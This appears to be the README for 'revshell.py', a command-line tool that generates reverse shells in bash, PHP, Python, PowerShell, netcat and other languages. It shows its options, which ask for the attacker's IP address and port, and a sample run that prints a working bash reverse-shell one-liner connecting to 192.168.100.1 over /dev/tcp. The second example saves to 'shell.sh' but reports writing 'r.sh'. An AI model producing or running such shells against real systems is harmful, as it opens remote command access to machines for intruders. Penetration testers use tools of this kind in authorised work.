A Reverse Shell Generator from CLI.
▄▄▄▄▄ ▄▄▄▄ █ ▀▀█ ▀▀█
█ ▀█ ▄▄▄ ▄ ▄ ▄▄▄ ▄ ▄▄ ▄▄▄ ▄▄▄ █▀ ▀ █ ▄▄ ▄▄▄ █ █
█▄▄▄▄▀ █▀ █ ▀▄ ▄▀ █▀ █ █▀ ▀ █ ▀ █▀ █ ▀█▄▄▄ █▀ █ █▀ █ █ █
█ ▀▄ █▀▀▀▀ █▄█ █▀▀▀▀ █ ▀▀▀▄ █▀▀▀▀ ▀█ █ █ █▀▀▀▀ █ █
█ ▀ ▀█▄▄▀ █ ▀█▄▄▀ █ ▀▄▄▄▀ ▀█▄▄▀ ▀▄▄▄█▀ █ █ ▀█▄▄▀ ▀▄▄ ▀▄▄
by @Masood2000
usage: revshell.py [-h] --address IP_ADDRESS --port PORT [--output OUT_FILE]
{bash,php,php_one_liner,php_windows,perl,perl_windows,python,python2_windows,powershell,powershell_nishang,netcat,netcat_windows,netcat_windows_ps,lua,ruby,golang,awk}
positional arguments:
{bash,php,php_one_liner,php_windows,perl,perl_windows,python,python2_windows,powershell,powershell_nishang,netcat,netcat_windows,netcat_windows_ps,lua,ruby,golang,awk}
The type of reverse shell you want to generate.
options:
-h, --help show this help message and exit
--address IP_ADDRESS, -i IP_ADDRESS
The Attacker's IP Address.
--port PORT, -p PORT The Attacker's Listening Port.
--output OUT_FILE, -o OUT_FILE
The Output file name of the reverse shell.
$ python3 revshell.py bash -i 192.168.100.1 -p 222
▄▄▄▄▄ ▄▄▄▄ █ ▀▀█ ▀▀█
█ ▀█ ▄▄▄ ▄ ▄ ▄▄▄ ▄ ▄▄ ▄▄▄ ▄▄▄ █▀ ▀ █ ▄▄ ▄▄▄ █ █
█▄▄▄▄▀ █▀ █ ▀▄ ▄▀ █▀ █ █▀ ▀ █ ▀ █▀ █ ▀█▄▄▄ █▀ █ █▀ █ █ █
█ ▀▄ █▀▀▀▀ █▄█ █▀▀▀▀ █ ▀▀▀▄ █▀▀▀▀ ▀█ █ █ █▀▀▀▀ █ █
█ ▀ ▀█▄▄▀ █ ▀█▄▄▀ █ ▀▄▄▄▀ ▀█▄▄▀ ▀▄▄▄█▀ █ █ ▀█▄▄▀ ▀▄▄ ▀▄▄
by @Masood2000
[*] Shell is:
=========================
bash -i >& /dev/tcp/192.168.100.1/222 0>&1
=========================
$ python revshell.py bash -i 192.168.0.100 -p 9001 -o shell.sh
▄▄▄▄▄ ▄▄▄▄ █ ▀▀█ ▀▀█
█ ▀█ ▄▄▄ ▄ ▄ ▄▄▄ ▄ ▄▄ ▄▄▄ ▄▄▄ █▀ ▀ █ ▄▄ ▄▄▄ █ █
█▄▄▄▄▀ █▀ █ ▀▄ ▄▀ █▀ █ █▀ ▀ █ ▀ █▀ █ ▀█▄▄▄ █▀ █ █▀ █ █ █
█ ▀▄ █▀▀▀▀ █▄█ █▀▀▀▀ █ ▀▀▀▄ █▀▀▀▀ ▀█ █ █ █▀▀▀▀ █ █
█ ▀ ▀█▄▄▀ █ ▀█▄▄▀ █ ▀▄▄▄▀ ▀█▄▄▀ ▀▄▄▄█▀ █ █ ▀█▄▄▀ ▀▄▄ ▀▄▄
by @Masood2000
[+] Successfully Stored reverse shell to file r.sh.